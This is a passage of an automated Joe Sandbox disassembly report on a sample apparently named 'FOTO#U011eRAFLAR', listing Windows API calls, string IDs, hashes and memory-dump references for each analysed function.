                                                                      • Opcode Fuzzy Hash: 31bbcca8f935c4c1f112041e3986b6d44e7d19c355b454aebe7cc5e76e1a7b6b
                                                                      • Instruction Fuzzy Hash: 4B41AF71A00319ABDB21DF64CC45FEA7BAAFF09350F140526F948E7291D775DA848BB0
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D7BC1B
                                                                      • IsMenu.USER32(00000000), ref: 00D7BC3B
                                                                      • CreatePopupMenu.USER32 ref: 00D7BC71
                                                                      • GetMenuItemCount.USER32(00ED6C80), ref: 00D7BCC2
                                                                      • InsertMenuItemW.USER32(00ED6C80,?,00000001,00000030), ref: 00D7BCEA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                      • String ID: 0$2
                                                                      • API String ID: 93392585-3793063076
                                                                      • Opcode ID: 01050360bcddcda6c05dc873df4780fb0b1128d27e9faadc05b67084af2fb61b
                                                                      • Instruction ID: 62e3cbaa8d2b7001b045ab90ec46df71184ef79d754f9f7ce796214b0915d3ce
                                                                      • Opcode Fuzzy Hash: 01050360bcddcda6c05dc873df4780fb0b1128d27e9faadc05b67084af2fb61b
                                                                      • Instruction Fuzzy Hash: 2551A0709002099BDF21CF78D988BAEBBE5EF45324F28C15AE84AD7291F7719940CB71
                                                                      APIs
                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00D7C831
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 2457776203-404129466
                                                                      • Opcode ID: b3fb64c1a43622786ec948e6abf1c6d96924b4866dfd2906606ab71eee05a19e
                                                                      • Instruction ID: 92df2cd3c611d70c2ae78014801787d14925a7c094b36a20a7a779cfb84ca9e3
                                                                      • Opcode Fuzzy Hash: b3fb64c1a43622786ec948e6abf1c6d96924b4866dfd2906606ab71eee05a19e
                                                                      • Instruction Fuzzy Hash: 3411D53165830ABEE7049A549C82EAE67DCDF19364F60903EF908A6381FBE4BD0045B9
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                      • String ID: 0.0.0.0
                                                                      • API String ID: 642191829-3771769585
                                                                      • Opcode ID: 6c1373c1a4fb1239105c8aea0ed5981e8d368386bb8a1a90770add602ccabb6e
                                                                      • Instruction ID: de774fe7310e280e6501d307b3f0dad3e4459776081269ac799a76ed30d9f697
                                                                      • Opcode Fuzzy Hash: 6c1373c1a4fb1239105c8aea0ed5981e8d368386bb8a1a90770add602ccabb6e
                                                                      • Instruction Fuzzy Hash: 2511E132504214ABDB35AB60DC4AFDE37BCDF06320F0440A9F089E6092FF749A81CAB0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$LocalTime
                                                                      • String ID:
                                                                      • API String ID: 952045576-0
                                                                      • Opcode ID: f213cf69395ef0e388eb916156d5bc50ac1cca9c4f68436d864b2f229048ab9e
                                                                      • Instruction ID: dc422fac0a382b7ba6f37542e6e49fcd5ea6a18bdd1a024be76136792ac1c79b
                                                                      • Opcode Fuzzy Hash: f213cf69395ef0e388eb916156d5bc50ac1cca9c4f68436d864b2f229048ab9e
                                                                      • Instruction Fuzzy Hash: 5641516AC1021475CB21EBF89C4A9CFB7A9EF09310F508466F518E3162FA34E655C7B9
                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00D6EEDF,00000004,00000000,00000000), ref: 00D2EF72
                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00D6EEDF,00000004,00000000,00000000), ref: 00D6F0EE
                                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00D6EEDF,00000004,00000000,00000000), ref: 00D6F171
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: d9e0e7a36cf1b08198645026ef993b68aed866384df1b7eff43e89b65bf25327
                                                                      • Instruction ID: c496e2ce68c27447ad3ea2254053588be39a3bbc74d5ba1aca9a315d9eaa00b5
                                                                      • Opcode Fuzzy Hash: d9e0e7a36cf1b08198645026ef993b68aed866384df1b7eff43e89b65bf25327
                                                                      • Instruction Fuzzy Hash: 6A41FA31208B90EBDB35DB29FE8872A7B92AFA7318F1C541CE08646761C675D880CB31
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 00DA2C4E
                                                                      • GetDC.USER32(00000000), ref: 00DA2C56
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DA2C61
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00DA2C6D
                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00DA2CA9
                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00DA2CBA
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00DA599A,?,?,000000FF,00000000,?,000000FF,?), ref: 00DA2CF5
                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00DA2D14
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 3864802216-0
                                                                      • Opcode ID: 531f27c1bb9d8e61d87b191a94c9509ec2be778d7cf97c7516b035df3a1b0a81
                                                                      • Instruction ID: 6c19d0e9503a1239d0c4843d36636b42647d36383bf93080eb8685be9008b2ab
                                                                      • Opcode Fuzzy Hash: 531f27c1bb9d8e61d87b191a94c9509ec2be778d7cf97c7516b035df3a1b0a81
                                                                      • Instruction Fuzzy Hash: F9316D72211214BBEF158F15CC4AFFB3BA9EF0A721F084055FE09DA291D6759841C7B4
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: 54f56ebe2f7e2befe4487052878480e9e56113829b7084350190adf37d083351
                                                                      • Instruction ID: 0579d7148ea0eb3a6d0f10632e76042d0736cab332137003b5f65321273ecf14
                                                                      • Opcode Fuzzy Hash: 54f56ebe2f7e2befe4487052878480e9e56113829b7084350190adf37d083351
                                                                      • Instruction Fuzzy Hash: 75210761600A0A7FE7107A11ED82FEF336DDE02394F588020FD0C96545F794EE15C6B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 0-572801152
                                                                      • Opcode ID: dea0de3797b881485295ab8dd5f482f40dd74c585a9aa77e874fb467c6691741
                                                                      • Instruction ID: e94fbe95496138904d7efb3a0ee7737801bf179bad915bc3507743a37081a955
                                                                      • Opcode Fuzzy Hash: dea0de3797b881485295ab8dd5f482f40dd74c585a9aa77e874fb467c6691741
                                                                      • Instruction Fuzzy Hash: 05D19E71A0060AAFDF11CFA8D881EAEB7B5FF48304F148169E915AB285E771ED45CB70
                                                                      APIs
                                                                      • GetCPInfo.KERNEL32(?,?), ref: 00D5156E
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00D515F1
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D51684
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00D5169B
                                                                        • Part of subcall function 00D437B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00D2FD75,?,?,00D1B63D,00000000,?,?,?,00D8106C,00DAD0D0,?,00D5242E), ref: 00D437E2
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D51717
                                                                      • __freea.LIBCMT ref: 00D51742
                                                                      • __freea.LIBCMT ref: 00D5174E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                      • String ID:
                                                                      • API String ID: 2829977744-0
                                                                      • Opcode ID: ab145a74c39c6a8ea9028d1bd4b68186470aeaef006243181e2258a2b1dd2c16
                                                                      • Instruction ID: e53aab36b9ac2c9193d1d6ab9ddaeb0fe6e6f6ffe78630e97bab076f277ee4c9
                                                                      • Opcode Fuzzy Hash: ab145a74c39c6a8ea9028d1bd4b68186470aeaef006243181e2258a2b1dd2c16
                                                                      • Instruction Fuzzy Hash: 1991A27AE002169BDF218E68C881BEE7BB5EF49752F184559EC16E7241EB34DC48CB70
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit
                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                      • API String ID: 2610073882-625585964
                                                                      • Opcode ID: 4d86e3df7ec633f759b5c2abb063b0222d6eab16c348c3e5f30dde3a5c900ff9
                                                                      • Instruction ID: c0b1167e2be64a20e73b4c7e4beefc79ff8bfe7f7892033ac9e878a7b63ba8bf
                                                                      • Opcode Fuzzy Hash: 4d86e3df7ec633f759b5c2abb063b0222d6eab16c348c3e5f30dde3a5c900ff9
                                                                      • Instruction Fuzzy Hash: 64919CB1A00219ABCF24CFA4C844FEEBBB8EF46714F14855AF515AB281D7709946CB70
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ObjectSelect$BeginCreatePath
                                                                      • String ID:
                                                                      • API String ID: 3225163088-0
                                                                      • Opcode ID: 2932d6060dc6683532d019e3209904f59bf08ca73bb3a98c861bea557a006836
                                                                      • Instruction ID: fda644f3a8837f049f9779caa8298d2b2bd4a5dd3e00299e362426c213eafff0
                                                                      • Opcode Fuzzy Hash: 2932d6060dc6683532d019e3209904f59bf08ca73bb3a98c861bea557a006836
                                                                      • Instruction Fuzzy Hash: 5F912371940219AFCB10CFA9D884AEEBBB9FF49324F158459E511B7251D378A981CF70
                                                                      APIs
                                                                      • SafeArrayGetVartype.OLEAUT32(?,?), ref: 00D8117A
                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00D811A2
                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00D811C6
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00D811F6
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00D8127D
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00D812E2
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00D8134E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                      • String ID:
                                                                      • API String ID: 2550207440-0
                                                                      • Opcode ID: 01d6c4c606d240e1c514886072e584e5e98119dfd56f901dd781298cf0ae2dbc
                                                                      • Instruction ID: e5f67da0bc35cd081eb41338e308a2f0f622d6bdc7d9fd7938a2394d0c3a5301
                                                                      • Opcode Fuzzy Hash: 01d6c4c606d240e1c514886072e584e5e98119dfd56f901dd781298cf0ae2dbc
                                                                      • Instruction Fuzzy Hash: A991D279A00319AFDB00AF94D889BBEB7B9FF05724F144029E541E7291D774E94ACBB0
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00D93892
                                                                      • CharUpperBuffW.USER32(?,?), ref: 00D939A1
                                                                      • _wcslen.LIBCMT ref: 00D939B1
                                                                      • VariantClear.OLEAUT32(?), ref: 00D93B46
                                                                        • Part of subcall function 00D80BFD: VariantInit.OLEAUT32(00000000), ref: 00D80C3D
                                                                        • Part of subcall function 00D80BFD: VariantCopy.OLEAUT32(?,?), ref: 00D80C46
                                                                        • Part of subcall function 00D80BFD: VariantClear.OLEAUT32(?), ref: 00D80C52
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                      • API String ID: 4137639002-1221869570
                                                                      • Opcode ID: 13c608f9670a0c28b4078f3756f83fa4e67c537dad3d1c28d6ce5e67ca911118
                                                                      • Instruction ID: f096082c38a8f1324dacfe373513f3325f0af75609e523e0828f668be35d1a2a
                                                                      • Opcode Fuzzy Hash: 13c608f9670a0c28b4078f3756f83fa4e67c537dad3d1c28d6ce5e67ca911118
                                                                      • Instruction Fuzzy Hash: F2915974608341AFCB00DF28D48196ABBE5FF89314F14892EF88987351DB71EE45CBA2
                                                                      APIs
                                                                        • Part of subcall function 00D6FEF7: CLSIDFromProgID.OLE32(?,?,?,?,?,?,?,-C000001E,00000001,?,00D6FE2A,80070057), ref: 00D6FF14
                                                                        • Part of subcall function 00D6FEF7: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00D6FE2A,80070057), ref: 00D6FF2F
                                                                        • Part of subcall function 00D6FEF7: lstrcmpiW.KERNEL32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00D6FE2A,80070057), ref: 00D6FF3D
                                                                        • Part of subcall function 00D6FEF7: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00D6FE2A,80070057), ref: 00D6FF4D
                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00D94B78
                                                                      • _wcslen.LIBCMT ref: 00D94C80
                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00D94CF6
                                                                      • CoTaskMemFree.OLE32(?), ref: 00D94D01
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                      • String ID: NULL Pointer assignment
                                                                      • API String ID: 614568839-2785691316
                                                                      • Opcode ID: 58dd28d154f0ba7642dbea35fe2a7edb368ac62c5e32570c0acc58296a28de89
                                                                      • Instruction ID: 3965b54451e859cb4dbd8a5ad8c07b8beebf51453de335b347e2d2de0ed0983f
                                                                      • Opcode Fuzzy Hash: 58dd28d154f0ba7642dbea35fe2a7edb368ac62c5e32570c0acc58296a28de89
                                                                      • Instruction Fuzzy Hash: F691F571D01219ABDF10DFA4D891EEEBBB8FF08314F10816AE915A7251EB749A45CBB0
                                                                      APIs
                                                                      • GetMenu.USER32(?), ref: 00DA20B6
                                                                      • GetMenuItemCount.USER32(00000000), ref: 00DA20E8
                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DA2110
                                                                      • _wcslen.LIBCMT ref: 00DA2146
                                                                      • GetMenuItemID.USER32(?,?), ref: 00DA2180
                                                                      • GetSubMenu.USER32(?,?), ref: 00DA218E
                                                                        • Part of subcall function 00D73985: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D7399F
                                                                        • Part of subcall function 00D73985: GetCurrentThreadId.KERNEL32 ref: 00D739A6
                                                                        • Part of subcall function 00D73985: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D724F7), ref: 00D739AD
                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DA2216
                                                                        • Part of subcall function 00D7E899: Sleep.KERNEL32 ref: 00D7E911
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696089256.0000000000DD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696123812.0000000000DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1696136271.0000000000DE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_d10000_FOTO#U011eRAFLAR.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                      • String ID:
                                                                      • API String ID: 4196846111-0
                                                                      • Opcode ID: 0147df20aaf1981c3b6a9ec529a5c56f4dd6e97cb6ec63897d181896b08dfae9
                                                                      • Instruction ID: 7fbf6d7911b2c416eaf9f798931ea55371aa11f949f809c5a2229e5698bbe2fe
                                                                      • Opcode Fuzzy Hash: 0147df20aaf1981c3b6a9ec529a5c56f4dd6e97cb6ec63897d181896b08dfae9
                                                                      • Instruction Fuzzy Hash: F2716E75A00205AFCB00DF69C845ABEBBB5EF89320F148459E916EB351DB34E9418BB0
                                                                      APIs
                                                                      • IsWindow.USER32(00ED6B18), ref: 00DA7E29
                                                                      • IsWindowEnabled.USER32(00ED6B18), ref: 00DA7E35
                                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00DA7F10
                                                                      • SendMessageW.USER32(00ED6B18,000000B0,?,?), ref: 00DA7F43
                                                                      • IsDlgButtonChecked.USER32(?,?), ref: 00DA7F7B
                                                                      • GetWindowLongW.USER32(00ED6B18,000000EC), ref: 00DA7F9D
                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00DA7FB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1696043448.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true
                                                                      • Associated: 00000000.00000002.1696030854.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
